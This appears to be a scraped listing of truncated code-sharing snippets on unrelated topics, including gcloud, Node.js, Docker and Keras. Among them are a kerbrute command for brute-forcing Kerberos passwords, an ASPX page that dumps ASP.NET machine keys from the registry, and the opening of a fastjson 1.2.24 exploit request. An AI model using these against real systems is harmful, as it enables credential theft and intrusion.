pydevops

• 0.1. References
• 0.2. Other cheatsheets
• 0.3. Manage multiple gcloud config configurations
  • 0.3.1. Switch gcloud context with gcloud config
• 0.4. Credentials
• 0.5. info
• 0.6. projects
• 0.7. zones & regions
• 0.8. Organization
• 0.9. billing

TarlogicSecurity

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

branneman

Better local require() paths for Node.js

Problem

When the directory structure of your Node.js application (not library!) has some depth, you end up with a lot of annoying relative paths in your require calls like:

const Article = require('../../../../app/models/article');

Those suck for maintenance and they're ugly.

Possible solutions

jarun

prerequisites

• Compile the program in gcc with debug symbols enabled (-g)
• Do NOT strip the binary
• To generate assembly code using gcc use the -S option: gcc -S hello.c

utilities

objdump

irsdl

<%@ Page Language="C#" %>
<%
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/
Response.Write("<br/><hr/>");
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{});
if(autoGenKeyV4!=null)
	Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty));
Response.Write("<br/>");
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{});
if(autoGenKey!=null)

dasgoll

That’s one of the real strengths of Docker: the ability to go back to a previous commit. The secret is simply to docker tag the image you want.

Here’s an example. In this example, I first installed ping, then committed, then installed curl, and committed that. Then I rolled back the image to contain only ping:

$ docker history imagename
IMAGE               CREATED             CREATED BY                SIZE
f770fc671f11        12 seconds ago      apt-get install -y curl   21.3 MB
28445c70c2b3        39 seconds ago      apt-get install ping      11.57 MB
8dbd9e392a96        7 months ago                                  131.5 MB

mbollmann

class AttentionLSTM(LSTM):
    """LSTM with attention mechanism

    This is an LSTM incorporating an attention mechanism into its hidden states.
    Currently, the context vector calculated from the attended vector is fed
    into the model's internal states, closely following the model by Xu et al.
    (2016, Sec. 3.1.2), using a soft attention model following
    Bahdanau et al. (2014).

    The layer expects two inputs instead of the usual one:

cbaziotis

from keras import backend as K, initializers, regularizers, constraints
from keras.engine.topology import Layer


def dot_product(x, kernel):
    """
    Wrapper for dot product operation, in order to be compatible with both
    Theano and Tensorflow
    Args:

cbaziotis

def dot_product(x, kernel):
    """
    Wrapper for dot product operation, in order to be compatible with both
    Theano and Tensorflow
    Args:
        x (): input
        kernel (): weights
    Returns:
    """
    if K.backend() == 'tensorflow':

pikpikcu

fastjson ver:1.2.24

POST / HTTP/1.1
Host: REDACTED
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Type: application/json